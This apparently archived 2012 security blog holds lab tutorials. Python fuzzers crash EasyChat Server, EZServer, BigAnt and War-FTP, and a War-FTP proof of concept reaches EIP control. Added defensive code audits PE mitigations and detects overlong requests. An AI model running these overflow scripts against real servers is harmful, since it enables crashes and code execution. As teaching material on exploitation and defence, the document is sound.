Autopsy
The Autopsy Forensic Browser is a graphical interface to the digital investigation tools in The
Sleuth Kit. Together, they allow you to investigate the file system and volumes of a computer.
PTK
PTK forensics is a computer forensic framework for the command-line tools in The Sleuth Kit, plus
many more software modules. This makes it usable and easy to investigate a system. PTK forensics
offers many features, such as multi-user analysis and the search and management of complex digital
investigation cases. The core component of the software is an efficient indexing engine that performs
different preliminary analysis operations during the import phase of each piece of evidence. PTK
forensics is a complex web application based on very innovative technologies, with an
appealing, highly dynamic and very easy-to-use interface. Its developers used the PHP language and
a back-end MySQL database, thus implementing the LAMP structure (Linux-Apache-MySQL-PHP).
Monday, November 5, 2012
Friday, October 19, 2012
Crafted File with Msfpayload and Msfencode
Metasploit is a framework which provides information about security vulnerabilities and aids in penetration testing.
There are several programs in Metasploit, including msfpayload and msfencode.
msfpayload is one of the tools contained in Metasploit, used to make a payload.
Wednesday, October 10, 2012
Software Exploitation : Easy Chat Server
Now, I'm going to show you how to exploit an application called EasyChatServer running on Windows XP SP3.
As shown in the image above, we can access the server using a browser on the BackTrack system.
Because this application is a web application, we will capture its traffic using Wireshark.
From the above description, we can use the GET method to perform the exploitation.
Our first fuzzer:
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=80
data="\x41" * 5000
buff="GET /chat.ghp?username="+data+"&password="+data+"&room=1 HTTP/1.1\r\n"
buff+="Host:192.168.1.101\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff+"\r\n\r\n")
print "Sukses....!!"
sock.close()
Now we can see what happens in the SEH chain (View + SEH chain).
Then press Shift+F9, and look at this picture:
Looking for a stepping stone
A stepping stone is a file that contains a RETN POP POP command sequence. So, I choose ssleay.dll in the Easy Chat Server installation folder.
As we can see in the picture, the value of the bits in the second byte is zero, so the module does not have SafeSEH protection. Now we will look for RETN POP POP commands contained in the module ssleay32.dll.
root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll
We can use the RETN POP POP commands at address 0x1001b9a2.
In OllyDbg, select the menu View + Executable modules, then double-click ssleay32.dll.
In this module window, right-click + Search for + Sequence of commands.
A new window will appear; fill it with the following command.
Click the Find button and a new window will appear again.
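The same header information can be read without a debugger when auditing which modules an application ships without exploit mitigations. The following is an added example, not code from the original post: it goes beyond the SafeSEH check above and also reports the ASLR and DEP flags, and it assumes a 32-bit PE image. The function names and the sample header bytes are constructed for illustration.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE optional header
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400
LOAD_CONFIG_DIR = 10        # data-directory index of the load config directory

def audit_pe32(data):
    """Return mitigation findings read from a PE32 image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    opt = pe + 4 + 20                                     # signature + COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only 32-bit (PE32) images are handled")
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    lc_rva = lc_size = 0
    if n_dirs > LOAD_CONFIG_DIR:
        lc_rva, lc_size = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_DIR)
    if dll_chars & NO_SEH:
        seh = "NO_SEH: image declares no exception handlers"
    elif lc_rva == 0 or lc_size == 0:
        seh = "no load config directory, so no SafeSEH handler table"
    else:
        seh = "load config present: verify SEHandlerTable/SEHandlerCount are non-zero"
    return {
        "aslr": bool(dll_chars & DYNAMIC_BASE),
        "dep": bool(dll_chars & NX_COMPAT),
        "seh": seh,
    }

def sample_pe32(dll_chars, load_config=(0, 0)):
    """Constructed sample: PE32 headers only, not a loadable image."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)      # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x2102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    struct.pack_into("<I", opt, 92, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_DIR, *load_config)
    return dos + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    print(audit_pe32(sample_pe32(0x0000)))
    print(audit_pe32(sample_pe32(DYNAMIC_BASE | NX_COMPAT, (0x5000, 0x48))))
```

A module that reports no SafeSEH table and no ASLR is a candidate for rebuilding with /SAFESEH, /DYNAMICBASE and /NXCOMPAT, or for replacement with a current build.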
Seek offsets to overwrite SEH
In this step, we can use ./pattern_create.rb
Put the output of pattern_create (chatpattern.txt) into our fuzzer.
Then OllyDbg will look like the following:
Then press Shift+F9, and we will know the contents of EIP.
We can use pattern_offset.rb to determine the number of bytes before EIP is affected by the fuzzer.
With these results, we will modify our fuzzer as follows:
Run the fuzzer and look in OllyDbg.
Press Shift+F9 and see what happens in EIP.
Wednesday, October 3, 2012
Software Exploitation : EZServer6
In this tutorial, we will try to exploit a video server application called ezserver, running on Windows XP. This application can be accessed with a web browser on port 8000, so we will send a fuzzer that contains garbage data via the GET method.
The fuzzer used is as follows:
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=8000
buff="GET /" + "\x41" * 10000 + "HTTP/1.0\r\n\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
Let's fuzz and see what happens...
ezserver crashes and disappears from the screen. Then we will look at it through OllyDbg.
To be continued...^_^
Monday, October 1, 2012
Software Exploitation : BigAnt Server
As we know, BigAnt Server is compiled with SEH and SafeSEH. In this tutorial I'm going to show you how to exploit this application.
Fuzzing :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=6660
buff="USV " + "\x41" * 2500
buff+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff)
print "Sukses....!!"
sock.close()
Run this fuzzer and see what happens in OllyDbg.
But EIP is not overwritten by our fuzzer, because this application is compiled with SEH and SafeSEH. To look into SEH, select View + SEH chain.
So, press the Shift+F9 button to pass our fuzzer on to EIP.
In the figure above, we can see that EIP is overwritten with 41414141, where these characters come from the fuzzer.
To be continued...^_^
Friday, September 28, 2012
Local Buffer Overflow : Winamp v5.572
I try to make Winamp 5.572 running on Windows XP SP3 crash. First, I will send a music file to be run by winamp. To make this file, I search in exploit-db.
I would choose /windows/dos/12494.pl
root@bt:~# cp /pentest/exploits/exploitdb/platforms//windows/dos/12494.pl /root
root@bt:~# mv 12494.pl wincrash.pl
Change line 1 to this:
#!/usr/bin/perl
And then execute this file :
root@bt:~# perl wincrash.pl
Then there is a file X.swf.
Send it to Windows XP and play it with Winamp, and see what happens.
When viewed with OllyDbg:
Thanks...^_^
Wednesday, September 19, 2012
Software Exploitation Part 1
In this tutorial, I will try to explain the basics of software exploitation. On this occasion, I will give an example of a simple application that runs on Windows operating systems, called War-FTP. War-FTP is an FTP server application that runs on Windows and does not have protection against buffer overflow (non SEH). Ok, now what is a buffer overflow, and what is SEH?
Buffer Overflow
A buffer overflow happens when an application receives a bigger chunk of data than it is expecting, with the result that the data doesn't fit into the allocated storage space, or buffer. The reason that buffer overflow errors are so common is that human programmers make errors: they fail to foresee that unexpected data values may be entered, and they fail to carry out bounds checking to ensure that any data that a user enters falls within the expected range.
SEH
An exception is an event that occurs during the execution of a program, and requires the execution of code outside the normal flow of control. Structured exception handling is a mechanism for handling both hardware and software exceptions. When a SEH exception occurs, you typically see a window that offers to send an error report to Microsoft.
Let's begin!
Host : Backtrack 5 R2 (IP address : 192.168.1.1)
Target : Microsoft Windows XP SP3 (IP address 192.168.1.101)
Target apps : War-FTP on win XP (port 21)
Information gathering
from Nessus :
Description from Nessus (select as shown in the figure above):
The version of War FTP Daemon running on this host contains a buffer overflow in the code that handles the USER and PASS commands. A potential intruder could use this vulnerability to crash the server as well as run arbitrary commands on the system.
After this, we can start fuzzing with a simple fuzzer. We will try to send 1000 'A' characters to the War-FTP application with this fuzzer.
#!/usr/bin/python
#file : myfuzzer.py
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x41" * 1000
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
We can run the fuzzer as follows:
Wow... the War-FTP application closed immediately. In this case, the War-FTP crash was caused by the fuzzer.
Ok, if we can't run War-FTP after this, we have to delete FtpDaemon.dat in our War-FTP folder.
Debugger
Now we want to know what happens in the memory of War-FTP. In this case, we will use a debugger on Windows XP, OllyDbg.
Run War-FTP under OllyDbg, and then we will fuzz again.
Ok, we will find out how many bytes it takes to reach the EIP register. We will use 2 little programs, pattern_create.rb & pattern_offset.rb. The location of the files is /opt/metasploit/apps/pro/msf3/tools/.
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb > string_pattern.txt
We will use the pattern in string_pattern.txt as the data when we fuzz.
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# pattern from string_pattern.txt; adjacent string literals are joined into one string
buff=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8A"
"b9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0"
"Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3"
"Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5"
"Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8"
"Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9"
"An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0"
"Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1"
"Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3"
"At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4"
"Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4"
"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5"
"Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6"
"Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8"
"Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1"
"Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B")
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Fuzz again, and you will see the following in War-FTP:
Now we will calculate the number of bytes from the pattern set generated by pattern_create.rb. We will use pattern_offset.rb.
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 32714131
485
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb q4Aq5Aq
493
root@bt:/opt/metasploit/apps/pro/msf3/tools#
Note:
32714131 is the address in EIP
q4Aq5Aq is the data at ESP
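Why those two lookups return 485 and 493 is easier to see when the pattern is rebuilt by hand. The following is an added example for crash triage, not code from the original post or from Metasploit: it regenerates the same Aa0Aa1Aa2... pattern and locates a register value or a piece of text in it. The function names are made up for this illustration.

```python
import string
import struct

def cyclic_pattern(length):
    """Build the Upper/lower/digit pattern (Aa0Aa1Aa2...) truncated to `length`."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]

def offset_of_text(text, length=1000):
    """Offset of literal text (for example the bytes seen at ESP), or -1."""
    return cyclic_pattern(length).find(text)

def register_to_text(hex_value):
    """Convert a 32-bit register reading to the bytes as they lay in memory.

    x86 is little-endian: the lowest byte of the register is the first byte
    of the input, so 0x32714131 was sent as 31 41 71 32, the text "1Aq2".
    """
    return struct.pack("<I", int(hex_value, 16)).decode("latin-1")

def offset_of_register(hex_value, length=1000):
    """Offset of the four input bytes that ended up in a register, or -1."""
    return offset_of_text(register_to_text(hex_value), length)

if __name__ == "__main__":
    eip = offset_of_register("32714131")
    esp = offset_of_text("q4Aq5Aq")
    print("bytes in EIP:", register_to_text("32714131"), "at offset", eip)
    print("ESP points at offset", esp)
    print("bytes between the end of EIP and ESP:", esp - (eip + 4))
```

Because every three-character group occurs only once, any four consecutive bytes identify exactly one position in the input, which is what makes the lookup unambiguous.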
Ok, we will modify our fuzzer as follows :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Fuzzing again...
Ok, we will modify again our fuzzer as follows :
#!/usr/bin/python
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buff="\x90" * 485
buff+="\xEF\xBE\xAD\xDE"
buff+="\x90" * (493-len(buff))
buff+="\xCC" * (1000 - len(buff))
s.connect(('192.168.1.101',21))
data=s.recv(1024)
print("Sending evil data via USER command...")
s.send('USER '+buff+'\r\n')
data=s.recv(1024)
s.send('PASS PASSWORD '+'\r\n')
s.close()
print("Finish")
Continued on software exploitation part 2
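Every fuzzer on this page sends one protocol argument that is far longer than any legitimate value and is made of a single repeated byte or of the Aa0Aa1Aa2... offset pattern. The following is an added example of detection logic for such requests, not code from the original post: the thresholds, function names and sample request lines are constructed assumptions to be tuned for a real service.

```python
import re
from itertools import groupby
from urllib.parse import urlsplit, parse_qsl

MAX_ARG = 256      # assumed policy limit for one argument, in characters
MAX_RUN = 32       # assumed limit for one character repeated back to back
CYCLIC = re.compile(r"(?:[A-Z][a-z][0-9]){8,}")   # Aa0Aa1Aa2... offset patterns

def longest_run(text):
    """Length of the longest run of one repeated character."""
    return max((len(list(group)) for _, group in groupby(text)), default=0)

def fields(line):
    """Split one request line into (name, value) pairs worth inspecting."""
    verb, _, rest = line.strip().partition(" ")
    if verb in ("GET", "POST", "HEAD"):
        target = rest.rsplit(" ", 1)[0]            # drop the HTTP version
        parts = urlsplit(target)
        return [("path", parts.path)] + parse_qsl(parts.query, keep_blank_values=True)
    return [(verb, rest)]                          # FTP USER/PASS, BigAnt USV, ...

def inspect(line):
    """Return (field, reason, measure) findings for one request line."""
    findings = []
    for name, value in fields(line):
        if len(value) > MAX_ARG:
            findings.append((name, "overlong", len(value)))
        run = longest_run(value)
        if run >= MAX_RUN:
            findings.append((name, "byte-run", run))
        if CYCLIC.search(value):
            findings.append((name, "cyclic-pattern", len(value)))
    return findings

# Constructed sample requests: benign ones next to the shapes sent on this page.
SAMPLES = [
    "USER alice",
    "USER " + "A" * 1000,
    "GET /chat.ghp?username=bob&password=secret&room=1 HTTP/1.1",
    "GET /chat.ghp?username=" + "A" * 5000 + "&password=x&room=1 HTTP/1.1",
    "USV " + "A" * 2500,
    "USER Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[:40], inspect(sample))
```

The same three checks can sit in a reverse proxy or a log pipeline; rejecting any argument over the length limit before it reaches the service removes the crash condition regardless of what the argument contains.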